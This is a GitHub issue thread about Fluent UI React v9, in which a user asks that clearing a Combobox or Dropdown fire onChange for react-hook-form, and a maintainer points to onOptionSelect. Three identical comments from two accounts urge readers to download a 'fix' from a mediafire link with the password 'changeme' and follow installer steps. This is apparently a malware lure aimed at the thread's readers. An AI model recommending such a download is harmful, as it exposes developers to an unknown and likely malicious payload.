### ISSUE TITLE
[Feature]: Enhance clearable feature in Combobox and Dropdown: Using the clearButton should fire the onChange event

### ISSUE THREAD

**Issue by sven-pohl** [microsoft/fluentui#32389]
### Library

React Components / v9 (@fluentui/react-components)

### Describe the feature that you would like added

Currently clicking the clearButton just sets the selectedOptions to an empty array but does not fire the onChange event. Our understanding is, that clearing the selectedOptions property and therefore also setting the value of the component to undefined is a change of the state of the component. Forms need to be informed of this change to properly handle the state of the form (isDirty flags, etc.). This is usually done by firing the "onChange" event.

### Additional context

In our current project we use react-hook-form together with FluentUI react-components. Clearing comboboxes or dropdowns is not recognized as change of the components because the onChange event is nor fired. Therefore, the forms state isDirty and dirtyFields are not set. Unfortunately also no other event is fired so we are not able to mitigate this missing behaviour.

### Validations

- [X] Check that there isn't already an issue that requests the same feature to avoid creating a duplicate.

### Priority

High

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Hotell** [comment]
thoughts on this @smhigley ?

**Comment by ling1726** [comment]
The correct callback to listen to updates for clearable combobox is `onOptionSelect`https://stackblitz.com/edit/axguq8?file=src%2Fexample.tsx.


The `clearable` combobox does not support freeform or multiselect currently

**Comment by sven-pohl** [comment]
Not intuitive and per definition a bad DevX. But at least it works. Thanks, Sven
